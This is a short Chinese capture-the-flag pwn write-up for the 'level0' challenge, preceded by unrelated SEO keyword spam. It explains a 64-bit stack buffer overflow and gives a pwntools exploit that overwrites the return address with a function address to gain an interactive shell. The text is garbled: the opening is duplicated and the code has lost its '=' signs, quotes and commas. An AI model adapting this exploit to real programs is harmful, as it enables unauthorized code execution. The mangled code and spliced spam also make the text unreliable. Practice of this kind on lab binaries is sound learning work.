安全网站建设报价清单,百度营销登录平台,杭州有奖举报,简单网页设计模板网站小白垃圾做题笔记而已#xff0c;不建议阅读。。。 这道题感觉主要就是64位程序ebp8
题目中给出了shellcode
我们直接将返回地址覆盖就好。
在main函数中调用了vulnerable_function()函数。 vulnerable函数是一个漏洞函数#xff1a;(存在缓溢出)#xff0c;我们只需要将…小白垃圾做题笔记而已不建议阅读。。。 这道题感觉主要就是64位程序ebp8
题目中给出了shellcode
我们直接将返回地址覆盖就好。
在main函数中调用了vulnerable_function()函数。 vulnerable函数是一个漏洞函数(存在缓溢出)我们只需要将buf溢出到返回地址返回地址覆盖为sys函数地址即可。 exp这里用下大佬的模板。 from pwn import * debug1 if debug: pprocess(./level0) #pprocess(,env{LD_PRELOAD:./libc.so}) context.log_leveldebug pause() # gdb.attach(p) else: premote() def ru(x): return p.recvuntil(x) def se(x): p.send(x) sys_add0x040059A payloada*0x88p64(sys_add) ru( World\n) se(payload) p.interactive() ok